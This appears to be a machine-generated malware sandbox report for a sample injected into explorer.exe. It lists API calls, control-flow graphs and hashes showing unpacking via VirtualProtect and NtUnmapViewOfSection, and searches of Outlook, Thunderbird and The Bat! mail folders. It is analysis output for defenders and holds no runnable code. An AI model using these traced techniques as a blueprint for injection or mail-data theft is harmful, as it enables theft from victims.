                                                                                  • _aulldiv.NTDLL(?,00000000,?,00000000), ref: 0014F0AF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: _aulldivmemset
                                                                                  • String ID: %llu$%llu
                                                                                  • API String ID: 714058258-4283164361
                                                                                  • Opcode ID: c01d9fa16a3572383064abf1693741664aecaf03ac24c00ea04d0b414f4824f4
                                                                                  • Instruction ID: 0c64934b93a93adbfb47b65422bc3b834f2771dd68839bc6d05782ecbbd3ef9b
                                                                                  • Opcode Fuzzy Hash: c01d9fa16a3572383064abf1693741664aecaf03ac24c00ea04d0b414f4824f4
                                                                                  • Instruction Fuzzy Hash: 6B212772A406256BD710AE64DC02F7B77A9EFA0770F05873CF826972D1DB209C2687E1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • _allmul.NTDLL(?,00000000,?), ref: 00131F82
                                                                                  • _allmul.NTDLL(?,?,?,00000000), ref: 0013201C
                                                                                  • _allmul.NTDLL(?,00000000,00000000,?), ref: 0013204F
                                                                                  • _allmul.NTDLL(00122F96,00000000,?,?), ref: 001320A3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: _allmul
                                                                                  • String ID:
                                                                                  • API String ID: 4029198491-0
                                                                                  • Opcode ID: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                                                  • Instruction ID: 3cf9e09c5e6ed03d2af8c9f33937adfa797255571b91ebbc8d99a21d95aa2e70
                                                                                  • Opcode Fuzzy Hash: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                                                  • Instruction Fuzzy Hash: FCA15A71708702ABDB14EE64C891A2EB7E6EFD8744F10482CF6858B291DBB1EC458B52
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpymemset
                                                                                  • String ID:
                                                                                  • API String ID: 1297977491-0
                                                                                  • Opcode ID: 93531ae6043f475d782dde2bbd696ea544871cdeb419238af5712af0d196b23d
                                                                                  • Instruction ID: 61d453592fe19c6302e7956b2a24f40e7a18b99d0552e53a376ac80b188aad60
                                                                                  • Opcode Fuzzy Hash: 93531ae6043f475d782dde2bbd696ea544871cdeb419238af5712af0d196b23d
                                                                                  • Instruction Fuzzy Hash: FC8180B16083549FC364EF29C884A2BBBE5BF98714F14496DF88997352E770ED04CB92
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • lstrlen.KERNEL32(?,?,?,?,00000000,001228F3), ref: 00121AF3
                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,00000000,001228F3), ref: 00121AF8
                                                                                  • lstrcat.KERNEL32(00000000,?), ref: 00121B0E
                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00121B12
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrcatlstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 1475610065-0
                                                                                  • Opcode ID: acd8e285e8e1fc1e1e412c5b4a6114307ba17a4d7f9362fbc24dfa19daf082d0
                                                                                  • Instruction ID: b98261efe2800f2d1608bec56a19757083515f9fbc886b8b77c1b211ed3e9772
                                                                                  • Opcode Fuzzy Hash: acd8e285e8e1fc1e1e412c5b4a6114307ba17a4d7f9362fbc24dfa19daf082d0
                                                                                  • Instruction Fuzzy Hash: D0E092A270462C2B4720B6AE6C84D7B7AACCBE96A13050035FA0CD3202EF56AC4186F4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Callgraph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  • Opacity -> Relevance
                                                                                  • Disassembly available
                                                                                  callgraph 0 Function_00062E04 9 Function_00061B8C 0->9 43 Function_00061838 0->43 70 Function_00061860 0->70 1 Function_00061405 2 Function_00064005 3 Function_00062700 11 Function_00062688 3->11 3->70 4 Function_00061000 5 Function_00061980 6 Function_0006B00C 7 Function_0006298C 8 Function_0006188C 8->43 9->43 10 Function_00063608 65 Function_00063458 10->65 11->43 12 Function_00062308 13 Function_00061508 14 Function_00062514 29 Function_000623A0 14->29 52 Function_0006234C 14->52 55 Function_00062354 14->55 71 Function_00062360 14->71 81 Function_000623F0 14->81 15 Function_00061B14 15->43 16 Function_00069912 17 Function_00069C92 18 Function_00061D10 18->43 84 Function_000618F8 18->84 19 Function_00062410 35 Function_000623AC 19->35 19->81 20 Function_00062610 20->43 21 Function_0006971C 22 Function_0006141D 23 Function_0006A298 64 Function_0006A25A 23->64 24 Function_00062498 24->35 48 Function_00062340 24->48 25 Function_00064019 26 Function_000699A7 27 Function_000647A7 28 Function_00061822 30 Function_00061E20 30->5 30->8 30->18 30->43 47 Function_00061C40 30->47 62 Function_000618D0 30->62 68 Function_00061DE0 30->68 30->70 30->84 31 Function_000628A0 31->43 31->70 79 Function_00062774 31->79 32 Function_0006A1AF 32->23 33 Function_0006372C 33->43 33->70 34 Function_000622AC 36 Function_0006272C 37 Function_000630A8 37->3 37->11 37->36 37->37 37->70 83 Function_00062F7C 37->83 85 Function_00062AF8 37->85 38 Function_00069EB4 39 Function_000622B4 40 Function_000614B2 41 Function_00069930 42 Function_000638B0 42->42 42->43 56 Function_00061AD4 42->56 44 Function_00061938 45 Function_00062938 46 Function_00069FC2 49 Function_000629C0 49->11 50 Function_00062BC0 50->3 50->11 50->20 50->36 50->43 50->44 59 Function_00062A54 50->59 50->70 51 Function_000641CF 53 Function_00061A4C 54 Function_000636C8 54->15 66 Function_000621E4 54->66 54->70 74 Function_000618E8 54->74 57 Function_000614D4 58 Function_00061254 59->43 59->70 60 Function_00063254 60->7 60->11 60->36 60->37 60->43 60->45 60->70 61 Function_0006A055 63 Function_00069ADA 65->3 65->11 65->31 65->43 65->49 65->60 65->65 65->70 65->79 66->30 66->43 66->70 67 Function_0006A1E0 67->23 68->53 69 Function_00061560 70->56 72 Function_0006156C 73 Function_00062B6C 73->14 73->24 75 Function_000622E8 76 Function_00063668 76->65 77 Function_00061576 78 Function_0006B074 79->43 79->70 79->79 80 Function_000637F4 80->12 80->33 80->34 80->39 80->54 80->55 80->73 80->75 82 Function_00062570 80->82 81->35 82->29 82->43 82->55 83->0 83->50 83->59 83->70 86 Function_00062EF8 83->86 85->43 86->20 87 Function_0006A1F9 87->23 88 Function_000614F9

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 107 638b0-63907 call 61ad4 call 61838 NtUnmapViewOfSection call 6388c 116 63911-6391a 107->116 117 63909-6390c call 638b0 107->117 117->116
                                                                                  APIs
                                                                                  • NtUnmapViewOfSection.NTDLL ref: 000638F2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000011.00000002.1033807086.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_17_2_61000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: SectionUnmapView
                                                                                  • String ID:
                                                                                  • API String ID: 498011366-0
                                                                                  • Opcode ID: 175f204f98ddab081ce75ab585c860cf335b3b36596ebe57e2ab61619d8d81c0
                                                                                  • Instruction ID: 07d7c0bebfd5eab35338b42f632c169550439883b7608d4425e9f1fe2b024cbe
                                                                                  • Opcode Fuzzy Hash: 175f204f98ddab081ce75ab585c860cf335b3b36596ebe57e2ab61619d8d81c0
                                                                                  • Instruction Fuzzy Hash: F3F0A020F11A080FEAAC77FD685D3A822C2EB59310F900629B516C36D3DC398A458352
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000011.00000002.1033807086.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_17_2_61000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseEnumOpen
                                                                                  • String ID:
                                                                                  • API String ID: 1332880857-0
                                                                                  • Opcode ID: e6d0cc022632efdd4a3c5a8daf3e56bcebce22f91e00e29876c625ce24938a9c
                                                                                  • Instruction ID: d4483960c43caaeea037d42a9e10a4b875f7596f5693c41f599e3ec46e3d9013
                                                                                  • Opcode Fuzzy Hash: e6d0cc022632efdd4a3c5a8daf3e56bcebce22f91e00e29876c625ce24938a9c
                                                                                  • Instruction Fuzzy Hash: 82416C30718F0C4FDB98EF6D94997AAB6E2FBD8341F04456EA14EC3262DE34D9448782
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 41 6a298-6a29b 42 6a2a5-6a2a9 41->42 43 6a2b5 42->43 44 6a2ab-6a2b3 42->44 45 6a2b7 43->45 46 6a29d-6a2a3 43->46 44->43 47 6a2ba-6a2c1 45->47 46->42 49 6a2c3-6a2cb 47->49 50 6a2cd 47->50 49->50 50->47 51 6a2cf-6a2d2 50->51 52 6a2e7-6a2f4 51->52 53 6a2d4-6a2e2 51->53 63 6a2f6-6a2f8 52->63 64 6a30e-6a31c call 6a25a 52->64 54 6a2e4-6a2e5 53->54 55 6a31e-6a339 53->55 54->52 57 6a36a-6a36d 55->57 58 6a372-6a379 57->58 59 6a36f-6a370 57->59 62 6a37f-6a383 58->62 61 6a351-6a355 59->61 65 6a357-6a35a 61->65 66 6a33b-6a33e 61->66 67 6a385-6a39e LoadLibraryA 62->67 68 6a3e0-6a3e9 62->68 69 6a2fb-6a302 63->69 64->42 65->58 70 6a35c-6a360 65->70 66->58 74 6a340 66->74 73 6a39f-6a3a6 67->73 71 6a3ec-6a3f5 68->71 90 6a304-6a30a 69->90 91 6a30c 69->91 75 6a341-6a345 70->75 76 6a362-6a369 70->76 77 6a3f7-6a3f9 71->77 78 6a41a-6a46a VirtualProtect * 2 71->78 73->62 80 6a3a8 73->80 74->75 75->61 81 6a347-6a349 75->81 76->57 83 6a40c-6a418 77->83 84 6a3fb-6a40a 77->84 85 6a46e-6a473 78->85 86 6a3b4-6a3bc 80->86 87 6a3aa-6a3b2 80->87 81->61 89 6a34b-6a34f 81->89 83->84 84->71 85->85 92 6a475-6a484 85->92 88 6a3be-6a3ca 86->88 87->88 95 6a3d5-6a3df 88->95 96 6a3cc-6a3d3 88->96 89->61 89->65 90->91 91->64 91->69 96->73
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32 ref: 0006A397
                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 0006A441
                                                                                  • VirtualProtect.KERNELBASE ref: 0006A45F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000011.00000002.1033833244.0000000000069000.00000040.80000000.00040000.00000000.sdmp, Offset: 00069000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_17_2_69000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual$LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 895956442-0
                                                                                  • Opcode ID: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                                                  • Instruction ID: 006bc09559ba58e1e56ca86166064d69eaa2f5b492dea585316237ca25ff1824
                                                                                  • Opcode Fuzzy Hash: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                                                  • Instruction Fuzzy Hash: 99517D3175892E4BCB24BB7C9CC42F5B3C3F757321B18062AD08AD3385D559D9468B93
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 97 6372c-637ba call 61838 RegCreateKeyExW 101 637d6-637f0 call 61860 97->101 102 637bc-637cb 97->102 102->101 106 637cd-637d3 102->106 106->101
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000011.00000002.1033807086.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_17_2_61000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID: ?
                                                                                  • API String ID: 2289755597-1684325040
                                                                                  • Opcode ID: 90b71b727ca288489aec266a13dd0a18d59c7ad321cf10e681fca41da4c5c652
                                                                                  • Instruction ID: 0175cadc1eaba084e880b185854f7669454e214051596b44bd1488a6f786bdce
                                                                                  • Opcode Fuzzy Hash: 90b71b727ca288489aec266a13dd0a18d59c7ad321cf10e681fca41da4c5c652
                                                                                  • Instruction Fuzzy Hash: 9E11B970608B4C8FD750DF69D48865AB7E2FB98305F40062EE489C3321DF34D985CB82
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 119 622b4-622c6 120 622d6-622e6 119->120 121 622c8-622d0 CreateStreamOnHGlobal 119->121 121->120
                                                                                  APIs
                                                                                  • CreateStreamOnHGlobal.OLE32 ref: 000622D0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000011.00000002.1033807086.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_17_2_61000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateGlobalStream
                                                                                  • String ID:
                                                                                  • API String ID: 2244384528-0
                                                                                  • Opcode ID: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                                                  • Instruction ID: 6c511f69b69d8d3de49810070f3f7e1f5989998c8ca95c8496505d4ba7d4b445
                                                                                  • Opcode Fuzzy Hash: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                                                  • Instruction Fuzzy Hash: 7AE08C30108B0A8FD798AFBCE4CA07933A1EB9C252B05093EE005CB114D27988C18741
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 000C29B7: GetProcessHeap.KERNEL32(00000008,00000412,000C257A,000C18F4), ref: 000C29BA
                                                                                    • Part of subcall function 000C29B7: RtlAllocateHeap.NTDLL(00000000), ref: 000C29C1
                                                                                  • lstrcatW.KERNEL32(00000000), ref: 000C2588
                                                                                  • PathAppendW.SHLWAPI(00000000,*.*), ref: 000C2594
                                                                                  • FindFirstFileW.KERNELBASE(00000000,?,?,000C18F4), ref: 000C25A8
                                                                                  • RtlZeroMemory.NTDLL(00000209,00000209), ref: 000C25C3
                                                                                  • lstrcatW.KERNEL32(00000209,?), ref: 000C25E1
                                                                                  • PathAppendW.SHLWAPI(00000209,?), ref: 000C25ED
                                                                                  • lstrcatW.KERNEL32(00000209,?), ref: 000C2611
                                                                                  • PathAppendW.SHLWAPI(00000209,?), ref: 000C261D
                                                                                  • StrStrIW.SHLWAPI(00000209,?), ref: 000C262C
                                                                                  • FindNextFileW.KERNELBASE(00000000,?,?,000C18F4), ref: 000C2644
                                                                                  • FindClose.KERNEL32(00000000,?,000C18F4), ref: 000C2653
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000012.00000002.1037095992.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_18_2_c1000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: AppendFindPathlstrcat$FileHeap$AllocateCloseFirstMemoryNextProcessZero
                                                                                  • String ID: *.*
                                                                                  • API String ID: 1648349226-438819550
                                                                                  • Opcode ID: 329515299015115754a99fe8c92e62cebfe061dbb2c257de42b59b4e4072fed0
                                                                                  • Instruction ID: da3ce9b115ab183d6886fb55a74d7e368ca747b75625dd12c309b76a81677676
                                                                                  • Opcode Fuzzy Hash: 329515299015115754a99fe8c92e62cebfe061dbb2c257de42b59b4e4072fed0
                                                                                  • Instruction Fuzzy Hash: 0721A2722143059FE710AF20DD58FAFBBECEF85700F10451DFA51D2161DB388A068A76
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 154 c1016-c1020 call c27e2 157 c1024-c1049 call c29b7 RtlMoveMemory NtUnmapViewOfSection call c104f 154->157 158 c1022-c1023 154->158 162 c104e 157->162
                                                                                  APIs
                                                                                    • Part of subcall function 000C27E2: VirtualQuery.KERNEL32(00000000,00000209,0000001C,00000209,000C2664,?,000C18F4), ref: 000C27EF
                                                                                  • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 000C103A
                                                                                  • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 000C1043
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000012.00000002.1037095992.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_18_2_c1000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 1675517319-0
                                                                                  • Opcode ID: 3c86612802d6b4f0c149e9f47668a13a8d86651388321be600a92d2625d2504a
                                                                                  • Instruction ID: 0162ccaca988f0dc09f560cb1e1891540b497aac96d88d66199071bfbefa3e3c
                                                                                  • Opcode Fuzzy Hash: 3c86612802d6b4f0c149e9f47668a13a8d86651388321be600a92d2625d2504a
                                                                                  • Instruction Fuzzy Hash: CED05E32800260ABEA747774BC5EFCE3A88AF06370B348259B625924D3C97A4A808370
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 000C29B7: GetProcessHeap.KERNEL32(00000008,00000412,000C257A,000C18F4), ref: 000C29BA
                                                                                    • Part of subcall function 000C29B7: RtlAllocateHeap.NTDLL(00000000), ref: 000C29C1
                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Microsoft\Outlook,00000000,00000208,?,?,?,000C104E,?,000C1010), ref: 000C107F
                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%LOCALAPPDATA%\Microsoft\Outlook,00000000,00000208,?,?,?,000C104E,?,000C1010), ref: 000C1093
                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\Microsoft\Outlook,00000000,00000208,?,?,?,000C104E,?,000C1010), ref: 000C10A7
                                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000005,00000000), ref: 000C10BB
                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Thunderbird,00000000,00000208,?,?,?,000C104E,?,000C1010), ref: 000C10D3
                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\The Bat!,00000000,00000208,?,?,?,000C104E,?,000C1010), ref: 000C10E7
                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\The Bat!,00000000,00000208,?,?,?,000C104E,?,000C1010), ref: 000C10FB
                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\BatMail,00000000,00000208,?,?,?,000C104E,?,000C1010), ref: 000C110F
                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\BatMail,00000000,00000208,?,?,?,000C104E,?,000C1010), ref: 000C1123
                                                                                  • wsprintfA.USER32 ref: 000C116B
                                                                                  • ExitProcess.KERNEL32 ref: 000C1189
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000012.00000002.1037095992.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_18_2_c1000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnvironmentExpandStrings$HeapProcess$AllocateExitFolderPathSpecialwsprintf
                                                                                  • String ID: %ALLUSERSPROFILE%\BatMail$%ALLUSERSPROFILE%\Microsoft\Outlook$%ALLUSERSPROFILE%\The Bat!$%APPDATA%\BatMail$%APPDATA%\Microsoft\Outlook$%APPDATA%\The Bat!$%APPDATA%\Thunderbird$%LOCALAPPDATA%\Microsoft\Outlook$%s,
                                                                                  • API String ID: 1709485025-1688604020
                                                                                  • Opcode ID: baf3f8d2dd24976d6b2cfb285e59c8e06d4547810cc425caf75c14f6349248d5
                                                                                  • Instruction ID: 56dc6a2ef28333f9f857a1c12710c33df13daafd2a9288c584164001e58bb09f
                                                                                  • Opcode Fuzzy Hash: baf3f8d2dd24976d6b2cfb285e59c8e06d4547810cc425caf75c14f6349248d5
                                                                                  • Instruction Fuzzy Hash: 9831C3717502656BEA6533654C16FFF288D9F82BD4F08412CBA05DA3C3DE5D8E0185F5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000C2758
                                                                                  • Process32First.KERNEL32(00000000,?), ref: 000C2777
                                                                                  • lstrcmpi.KERNEL32(?,outlook.exe), ref: 000C278B
                                                                                  • Process32Next.KERNEL32(00000000,00000128), ref: 000C27A8
                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 000C27B3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000012.00000002.1037095992.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_18_2_c1000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
                                                                                  • String ID: outlook.exe
                                                                                  • API String ID: 868014591-749849299
                                                                                  • Opcode ID: 66e89562946a31ac8f9e4cc1ae59dc475b83ead95c91894777947c4b5af4a830
                                                                                  • Instruction ID: 1a23cb9bf89e6bd1b0c44c957bc72f56fdb8854b57b17cc238242561d4766d09
                                                                                  • Opcode Fuzzy Hash: 66e89562946a31ac8f9e4cc1ae59dc475b83ead95c91894777947c4b5af4a830
                                                                                  • Instruction Fuzzy Hash: 8DF09632515128EBE760AB74DC8DFEE77BCEB08721F104294F949E2191DB388F548A91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 82 c9cf6-c9d10 83 c9d15 82->83 84 c9d16-c9d28 83->84 86 c9d8e-c9d8f 84->86 87 c9d2a 84->87 90 c9d90-c9d95 86->90 88 c9d2c-c9d36 87->88 89 c9caf-c9cbd 87->89 88->83 91 c9d38-c9d43 88->91 92 c9cbf-c9cce 89->92 93 c9cd1-c9cf4 89->93 94 c9d96-c9d98 90->94 95 c9d44-c9d4c 91->95 92->93 93->82 96 c9d9a-c9d9f 94->96 97 c9da1 94->97 95->95 98 c9d4e-c9d50 95->98 96->97 97->90 99 c9da3 97->99 101 c9d79-c9d88 98->101 102 c9d52-c9d55 98->102 100 c9da8-c9daa 99->100 103 c9dac-c9db1 100->103 104 c9db3-c9db7 100->104 101->86 101->96 102->84 105 c9d57-c9d75 102->105 103->104 104->100 106 c9db9 104->106 107 c9f3d 105->107 108 c9d7b-c9d88 105->108 109 c9dbb-c9dc2 106->109 110 c9dc4-c9dc9 106->110 107->107 108->96 109->100 109->110 111 c9dd8-c9dda 110->111 112 c9dcb-c9dd4 110->112 115 c9ddc-c9de1 111->115 116 c9de3-c9de7 111->116 113 c9e4a-c9e4d 112->113 114 c9dd6 112->114 117 c9e52-c9e55 113->117 114->111 115->116 118 c9de9-c9dee 116->118 119 c9df0-c9df2 116->119 120 c9e57-c9e59 117->120 118->119 121 c9e14-c9e23 119->121 122 c9df4 119->122 120->117 125 c9e5b-c9e5e 120->125 123 c9e34-c9e41 121->123 124 c9e25-c9e2c 121->124 126 c9df5-c9df7 122->126 123->123 128 c9e43-c9e45 123->128 124->124 127 c9e2e 124->127 125->117 129 c9e60-c9e7c 125->129 130 c9df9-c9dfe 126->130 131 c9e00-c9e04 126->131 127->94 128->94 129->120 133 c9e7e 129->133 130->131 131->126 132 c9e06 131->132 134 c9e08-c9e0f 132->134 135 c9e11 132->135 136 c9e84-c9e88 133->136 134->126 134->135 135->121 137 c9ecf-c9ed2 136->137 138 c9e8a-c9ea0 136->138 139 c9ed5-c9edc 137->139 144 c9ea1-c9ea6 138->144 141 c9ede-c9ee0 139->141 142 c9f00-c9f30 VirtualProtect * 2 139->142 145 c9ee2-c9ef1 141->145 146 c9ef3-c9efe 141->146 143 c9f34-c9f38 142->143 143->143 147 c9f3a 143->147 144->136 148 c9ea8-c9eaa 144->148 145->139 146->145 147->107 149 c9eac-c9eb2 148->149 150 c9eb3-c9ec0 148->150 149->150 152 c9ec9-c9ecc 150->152 153 c9ec2-c9ec7 150->153 153->144
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000012.00000002.1037120491.00000000000C8000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C8000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_18_2_c8000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f9506820f9febb3d1384489bc7a553d3b809f7e778c0836166622880ef9e543f
                                                                                  • Instruction ID: 4ba22574da10791bed23efa9b285d8fb486bd461446bc1c7623672f0c444f997
                                                                                  • Opcode Fuzzy Hash: f9506820f9febb3d1384489bc7a553d3b809f7e778c0836166622880ef9e543f
                                                                                  • Instruction Fuzzy Hash: A9913A725193914FD7269F74CCC8FADBBE0EB62320B2D06ADD4D2CB296E7645806C760
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 163 c29b7-c29c7 GetProcessHeap RtlAllocateHeap
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000008,00000412,000C257A,000C18F4), ref: 000C29BA
                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 000C29C1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000012.00000002.1037095992.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_18_2_c1000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocateProcess
                                                                                  • String ID:
                                                                                  • API String ID: 1357844191-0
                                                                                  • Opcode ID: d966bd3e0ae5d550b2f35bf9ef608384b826172a95608f82be28ec421fd98efe
                                                                                  • Instruction ID: 13a4d97cf6b467dddfa1939f192fe383474be23361ec0aebe206d468fb058c3b
                                                                                  • Opcode Fuzzy Hash: d966bd3e0ae5d550b2f35bf9ef608384b826172a95608f82be28ec421fd98efe
                                                                                  • Instruction Fuzzy Hash: 6FA002B25606005BFD4457B5AE1EE157538A745701F108544774585054996855148721
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
